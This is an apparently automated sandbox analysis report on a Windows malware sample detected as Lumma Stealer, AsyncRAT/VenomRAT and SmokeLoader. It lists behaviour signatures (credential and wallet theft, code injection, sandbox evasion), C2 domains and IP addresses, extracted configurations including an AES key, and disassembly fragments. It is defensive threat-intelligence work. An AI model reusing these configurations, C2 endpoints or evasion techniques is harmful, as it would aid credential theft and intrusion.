Windows Analysis Report
e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe

Overview

General Information

Sample name: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe
Analysis ID: 1483387
MD5: eccdca95898d2ecce04660fad1209c1d
SHA1: 3be1d8f6d6a75943c1bf7af821d63a1701618f72
SHA256: 7231b59295966497d4a581249d0fd69dcef5de7981d5b3d09039310ca0b875c2
Tags: exe

Detection

LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Check for Windows Defender sandbox
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
System process connects to network (likely due to code injection or exploit)
Yara detected AsyncRAT
Yara detected Go Injector
Yara detected LummaC Stealer
Yara detected SmokeLoader
Yara detected VenomRAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Changes memory attributes in foreign processes to executable or writable
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious names
Deletes itself after installation
Drops VBS files to the startup folder
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious ZIP file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign process
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
PE file has a writeable .text section
Powershell drops PE file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
AsyncRAT AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool; however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
SmokeLoader The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body. SMOKY SPIDER https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

AV Detection

Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Avira: detected
Source: https://callosallsaospz.shop/ly3$ Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/apiple-sto:s Avira URL Cloud: Label: malware
Source: callosallsaospz.shop Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/api5 Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/api- Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/api1 Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/d3 Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop:443/api Avira URL Cloud: Label: malware
Source: https://mussangroup.com/wp-content/images/pic1.jpg Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/ Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/api Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/apidows Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\adjijwj Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: 00000003.00000002.1941477566.00000000001A0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://mzxn.ru/tmp/index.php", "http://100xmargin.com/tmp/index.php", "http://wgdnb4rc.xyz/tmp/index.php", "http://olinsw.ws/tmp/index.php"]}
Source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp Malware Configuration Extractor: VenomRAT {"Server": "94.156.79.190,193.222.96.24", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.2", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "KSXE50q1aBZS6zviv09LVn6h1agzpC0c", "Mutex": "aqswvfsywrpgi", "Certificate": "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", "ServerSignature": "WlDXsoQjOeItY/AjpYunYYPwdj7pVZk3AxP9TSMhaMXlTxtOfd/QUD9Td9tdZ/gqN8Mrd7dFRlgi6WvGULUn8oYyaqUlD8bhcaHBCb7iJvzMqGTkJovPSDs+PdIfDJwTAVY/j6J2UDT7B9Hux+AFROKdJXYBG233NvPZNBdQ8Yc=", "BDOS": "null"}
Source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp Malware Configuration Extractor: AsyncRAT {"Server": "94.156.79.190,193.222.96.24", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.2", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "KSXE50q1aBZS6zviv09LVn6h1agzpC0c", "Mutex": "aqswvfsywrpgi", "Certificate": "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", "ServerSignature": "WlDXsoQjOeItY/AjpYunYYPwdj7pVZk3AxP9TSMhaMXlTxtOfd/QUD9Td9tdZ/gqN8Mrd7dFRlgi6WvGULUn8oYyaqUlD8bhcaHBCb7iJvzMqGTkJovPSDs+PdIfDJwTAVY/j6J2UDT7B9Hux+AFROKdJXYBG233NvPZNBdQ8Yc=", "BDOS": "null", "External_config_on_Pastebin": "false"}
Source: EF14.exe.3868.9.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop"], "Build id": "pointer--"}
Source: liernessfornicsa.shop Virustotal: Detection: 19%
Source: mussangroup.com Virustotal: Detection: 13%
Source: callosallsaospz.shop Virustotal: Detection: 19%
Source: https://callosallsaospz.shop/api1 Virustotal: Detection: 15%
Source: https://callosallsaospz.shop/api- Virustotal: Detection: 14%
Source: https://liernessfornicsa.shop/api_ Virustotal: Detection: 15%
Source: shepherdlyopzc.shop Virustotal: Detection: 19%
Source: upknittsoappz.shop Virustotal: Detection: 19%
Source: https://callosallsaospz.shop:443/api Virustotal: Detection: 22%
Source: https://mussangroup.com/wp-content/images/pic1.jpg Virustotal: Detection: 6%
Source: https://liernessfornicsa.shop/N Virustotal: Detection: 15%
Source: unseaffarignsk.shop Virustotal: Detection: 22%
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\EF14.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dll ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\g2m.dll ReversingLabs: Detection: 41%
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Virustotal: Detection: 58%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\adjijwj Joe Sandbox ML: detected
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Joe Sandbox ML: detected
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03067A10 CryptUnprotectData, 16_2_03067A10
Source: 8EC7.exe, 00000007.00000003.2363296649.000002E4A1111000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_ab5431ce-4
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62336 version: TLS 1.0
Source: Binary string: System.Xml.ni.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: rust_dave_sideload.pdb source: vm.exe, 00000013.00000002.4123601062.000000006C8F8000.00000002.00000001.01000000.00000015.sdmp, lm.exe, 00000014.00000002.3069655853.000000006C888000.00000002.00000001.01000000.00000016.sdmp, vm.exe, 0000001A.00000002.3227475624.000000006C8F8000.00000002.00000001.01000000.00000015.sdmp, g2m.dll0.14.dr
Source: Binary string: System.ni.pdbRSDS source: WER250C.tmp.dmp.29.dr
Source: Binary string: BitLockerToGo.pdb source: EF14.exe, 00000009.00000003.2540291593.000001FBFFEF0000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2561692230.000000C000800000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000003.2540539671.000001FBFFEB0000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2560742888.000000C000400000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2561692230.000000C0008E6000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb& source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2659328365.000001B9B9E90000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.pdb) source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Configuration.ni.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Xml.pdbMZ@ source: WER250C.tmp.dmp.29.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WER250C.tmp.dmp.29.dr
Source: Binary string: BitLockerToGo.pdbGCTL source: EF14.exe, 00000009.00000003.2540291593.000001FBFFEF0000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2561692230.000000C000800000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000003.2540539671.000001FBFFEB0000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2560742888.000000C000400000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2561692230.000000C0008E6000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Configuration.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: mscorlib.pdbl source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Xml.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER250C.tmp.dmp.29.dr
Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2659328365.000001B9B9E90000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000013.00000000.2626820511.0000000000402000.00000002.00000001.01000000.00000013.sdmp, vm.exe, 00000013.00000002.4106639355.0000000000402000.00000002.00000001.01000000.00000013.sdmp, lm.exe, 00000014.00000002.3064617756.0000000000402000.00000002.00000001.01000000.00000014.sdmp, lm.exe, 00000014.00000000.2627426001.0000000000402000.00000002.00000001.01000000.00000014.sdmp, vm.exe, 0000001A.00000000.2764355472.0000000000402000.00000002.00000001.01000000.00000013.sdmp, vm.exe, 0000001A.00000002.3104887965.0000000000402000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: System.Core.ni.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Windows.Forms.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: mscorlib.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: mscorlib.ni.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Core.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.ni.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER250C.tmp.dmp.29.dr
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C87FBAE FindFirstFileExW, 20_2_6C87FBAE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [edi+0Ch] 16_2_03053260
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp+54h] 16_2_030672DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 16_2_030672DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp+54h] 16_2_03067189
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 16_2_03067189
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp+50h] 16_2_030691C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+00000820h] 16_2_03076F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esi+1Ch] 16_2_03076F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 16_2_03076F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+50h] 16_2_03076F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 16_2_03062E51
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp] 16_2_03087E80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+70h] 16_2_03067DEB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h 16_2_03067DEB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edx, dword ptr [esp] 16_2_03089C20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 16_2_0308A479
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edx, dword ptr [esp+30h] 16_2_0305FCB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edx, dword ptr [esp+00000200h] 16_2_0305FCB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp+10h] 16_2_03066CB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then push eax 16_2_03083CD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 16_2_0308B350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edi, eax 16_2_0308B350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 16_2_0308B350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 16_2_0306B360
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], 11081610h 16_2_030733B6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edx, dword ptr [esi+08h] 16_2_030643E5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [eax+edi*8], 11081610h 16_2_03074BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [03094A9Ch] 16_2_03074BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 16_2_03081BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then lea ebp, dword ptr [esp+03h] 16_2_03076210
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov word ptr [edx], 0000h 16_2_03063A2A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edi, byte ptr [ecx+esi] 16_2_03053A80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h 16_2_030682CB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 16_2_0306B920
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 16_2_0306B920
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+08h] 16_2_03061937
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edx, word ptr [ebx+eax*4] 16_2_03058960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp] 16_2_03058960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 16_2_0308B160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edi, eax 16_2_0308B160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 16_2_0308B160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esi+04h] 16_2_0307617A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [03094970h] 16_2_030741A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 16_2_0305A000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [ebx+ebp+02h], 0000h 16_2_0306D810
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edi, eax 16_2_0308B840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 16_2_0308B840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov word ptr [ecx], ax 16_2_03065871
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 00D23749h 16_2_0306E086
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 16_2_0306E086
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_03088880
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ebx, eax 16_2_030538D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+10h] 16_2_030630F6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp byte ptr [ecx], 00000000h 16_2_030630F6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 16_2_0308B700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edi, eax 16_2_0308B700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 16_2_0308B700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov al, 01h 16_2_0308A706
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx ecx, word ptr [esi+eax] 16_2_03086710
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], 11081610h 16_2_030737B6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 16_2_03064E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp byte ptr [ebx], 00000000h 16_2_03064E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 16_2_03064E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edi, eax 16_2_03063678
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then inc ebx 16_2_030666B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp+10h] 16_2_03066EF8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp byte ptr [ecx], 00000000h 16_2_03061D52
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 16_2_0308B5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edi, eax 16_2_0308B5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 16_2_0308B5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 16_2_03052DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+10h] 16_2_03063DE6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 16_2_030765F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 16_2_0306EC06
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movsx eax, byte ptr [esi+ecx] 16_2_0305E450

Networking

Source: C:\Windows\explorer.exe Network Connect: 77.221.157.163 80
Source: C:\Windows\explorer.exe Network Connect: 107.173.160.139 443
Source: C:\Windows\explorer.exe Network Connect: 107.173.160.137 443
Source: C:\Windows\explorer.exe Network Connect: 162.0.235.84 443
Source: C:\Windows\explorer.exe Network Connect: 109.172.114.212 80
Source: C:\Windows\explorer.exe Network Connect: 64.190.113.113 80
Source: C:\Windows\explorer.exe Network Connect: 186.145.236.93 80
Source: C:\Windows\explorer.exe Network Connect: 167.235.128.153 443
Source: C:\Windows\explorer.exe Network Connect: 154.144.253.197 80
Source: C:\Windows\explorer.exe Network Connect: 185.149.100.242 443
Source: Malware configuration extractor URLs: indexterityszcoxp.shop
Source: Malware configuration extractor URLs: lariatedzugspd.shop
Source: Malware configuration extractor URLs: callosallsaospz.shop
Source: Malware configuration extractor URLs: outpointsozp.shop
Source: Malware configuration extractor URLs: liernessfornicsa.shop
Source: Malware configuration extractor URLs: upknittsoappz.shop
Source: Malware configuration extractor URLs: shepherdlyopzc.shop
Source: Malware configuration extractor URLs: unseaffarignsk.shop
